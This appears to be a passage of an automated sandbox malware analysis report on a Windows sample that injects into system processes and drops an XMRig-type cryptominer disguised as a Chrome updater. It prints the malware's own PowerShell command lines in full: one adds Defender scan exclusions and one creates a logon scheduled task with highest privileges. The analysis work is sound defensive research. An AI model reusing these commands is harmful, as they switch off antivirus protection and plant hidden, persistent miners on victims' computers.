                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AF22588_2_00000202C0AF2258
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEBE3C8_2_00000202C0AEBE3C
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEFEF88_2_00000202C0AEFEF8
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AEBC308_2_00000202C0AEBC30
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AE2CDC8_2_00000202C0AE2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612DF2F89_2_000002A6612DF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612E16589_2_000002A6612E1658
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612DB23C9_2_000002A6612DB23C
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612DB0309_2_000002A6612DB030
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612D20DC9_2_000002A6612D20DC
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130FEF89_2_000002A66130FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6613122589_2_000002A661312258
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130BE3C9_2_000002A66130BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A66130BC309_2_000002A66130BC30
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A661302CDC9_2_000002A661302CDC
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE26B23C10_2_000002BAAE26B23C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE27165810_2_000002BAAE271658
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE26F2F810_2_000002BAAE26F2F8
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE26B03010_2_000002BAAE26B030
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE2620DC10_2_000002BAAE2620DC
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29BE3C10_2_000002BAAE29BE3C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE2A225810_2_000002BAAE2A2258
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29FEF810_2_000002BAAE29FEF8
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE29BC3010_2_000002BAAE29BC30
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAE292CDC10_2_000002BAAE292CDC
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED9165810_2_000002BAAED91658
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED8B23C10_2_000002BAAED8B23C
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED8F2F810_2_000002BAAED8F2F8
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED8B03010_2_000002BAAED8B030
                Source: C:\Windows\System32\dwm.exeCode function: 10_2_000002BAAED820DC10_2_000002BAAED820DC
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879920DC11_2_0000026A879920DC
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A8799B03011_2_0000026A8799B030
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A8799F2F811_2_0000026A8799F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A8799B23C11_2_0000026A8799B23C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879A165811_2_0000026A879A1658
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879C2CDC11_2_0000026A879C2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CBC3011_2_0000026A879CBC30
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CFEF811_2_0000026A879CFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879CBE3C11_2_0000026A879CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000026A879D225811_2_0000026A879D2258
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_000001795378165812_2_0000017953781658
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_000001795377B23C12_2_000001795377B23C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537720DC12_2_00000179537720DC
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_000001795377B03012_2_000001795377B030
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_000001795377F2F812_2_000001795377F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537B225812_2_00000179537B2258
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537ABE3C12_2_00000179537ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537A2CDC12_2_00000179537A2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537ABC3012_2_00000179537ABC30
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000179537AFEF812_2_00000179537AFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D5225812_2_0000017953D52258
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4BE3C12_2_0000017953D4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D42CDC12_2_0000017953D42CDC
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4BC3012_2_0000017953D4BC30
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000017953D4FEF812_2_0000017953D4FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D54165813_2_000002295D541658
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D53B23C13_2_000002295D53B23C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D53F2F813_2_000002295D53F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D53B03013_2_000002295D53B030
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D5320DC13_2_000002295D5320DC
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D57225813_2_000002295D572258
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56BE3C13_2_000002295D56BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56FEF813_2_000002295D56FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D56BC3013_2_000002295D56BC30
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002295D562CDC13_2_000002295D562CDC
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067E165814_2_00000253067E1658
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067DB23C14_2_00000253067DB23C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067DF2F814_2_00000253067DF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067DB03014_2_00000253067DB030
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_00000253067D20DC14_2_00000253067D20DC
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E7225814_2_0000025306E72258
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6BE3C14_2_0000025306E6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6FEF814_2_0000025306E6FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E62CDC14_2_0000025306E62CDC
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000025306E6BC3014_2_0000025306E6BC30
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BBC3015_2_000001845B3BBC30
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3B2CDC15_2_000001845B3B2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BBE3C15_2_000001845B3BBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3C225815_2_000001845B3C2258
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001845B3BFEF815_2_000001845B3BFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD42CDC16_2_000001ADECD42CDC
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4BC3016_2_000001ADECD4BC30
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4FEF816_2_000001ADECD4FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD5225816_2_000001ADECD52258
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_000001ADECD4BE3C16_2_000001ADECD4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D5590420DC17_2_000001D5590420DC
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55904B03017_2_000001D55904B030
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55904B23C17_2_000001D55904B23C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55905165817_2_000001D559051658
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55904F2F817_2_000001D55904F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D559072CDC17_2_000001D559072CDC
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907BC3017_2_000001D55907BC30
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907BE3C17_2_000001D55907BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55908225817_2_000001D559082258
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001D55907FEF817_2_000001D55907FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EB225818_2_00000241A9EB2258
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EA2CDC18_2_00000241A9EA2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EABC3018_2_00000241A9EABC30
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EAFEF818_2_00000241A9EAFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000241A9EABE3C18_2_00000241A9EABE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C1AB03021_2_000002152C1AB030
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C1A20DC21_2_000002152C1A20DC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C1AB23C21_2_000002152C1AB23C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C1B165821_2_000002152C1B1658
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C1AF2F821_2_000002152C1AF2F8
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EBC3021_2_000002152C3EBC30
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3E2CDC21_2_000002152C3E2CDC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3F225821_2_000002152C3F2258
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EBE3C21_2_000002152C3EBE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C3EFEF821_2_000002152C3EFEF8
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C89B03021_2_000002152C89B030
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C8920DC21_2_000002152C8920DC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C89B23C21_2_000002152C89B23C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C8A165821_2_000002152C8A1658
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 21_2_000002152C89F2F821_2_000002152C89F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7316B23C24_2_000001CD7316B23C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7317165824_2_000001CD73171658
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7316F2F824_2_000001CD7316F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7316B03024_2_000001CD7316B030
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD731620DC24_2_000001CD731620DC
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319BE3C24_2_000001CD7319BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD731A225824_2_000001CD731A2258
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319FEF824_2_000001CD7319FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD7319BC3024_2_000001CD7319BC30
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001CD73192CDC24_2_000001CD73192CDC
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8620DC26_2_000002824E8620DC
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E86B23C26_2_000002824E86B23C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E86F2F826_2_000002824E86F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E87165826_2_000002824E871658
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E86B03026_2_000002824E86B030
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E892CDC26_2_000002824E892CDC
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89BE3C26_2_000002824E89BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89FEF826_2_000002824E89FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8A225826_2_000002824E8A2258
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E89BC3026_2_000002824E89BC30
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8F2CDC26_2_000002824E8F2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FBE3C26_2_000002824E8FBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FFEF826_2_000002824E8FFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E90225826_2_000002824E902258
                Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002824E8FBC3026_2_000002824E8FBC30
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B473D165827_2_0000021B473D1658
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B473CB23C27_2_0000021B473CB23C
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B473C20DC27_2_0000021B473C20DC
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B473CB03027_2_0000021B473CB030
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B473CF2F827_2_0000021B473CF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B4225827_2_0000021B47B42258
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3BE3C27_2_0000021B47B3BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B32CDC27_2_0000021B47B32CDC
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3BC3027_2_0000021B47B3BC30
                Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000021B47B3FEF827_2_0000021B47B3FEF8
                Source: updater.exe.0.drStatic PE information: Number of sections : 11 > 10
                Source: ylVAEHbMLf.exeStatic PE information: Number of sections : 11 > 10
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@24/79@0/2
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,4_2_00007FF78AB32328
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,4_2_00007FF78AB31AC4
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,4_2_00007FF78AB32328
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeFile created: C:\Users\user\AppData\Roaming\GoogleJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeFile created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmpJump to behavior
                Source: ylVAEHbMLf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ylVAEHbMLf.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeFile read: C:\Users\user\Desktop\ylVAEHbMLf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ylVAEHbMLf.exe "C:\Users\user\Desktop\ylVAEHbMLf.exe"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to behavior
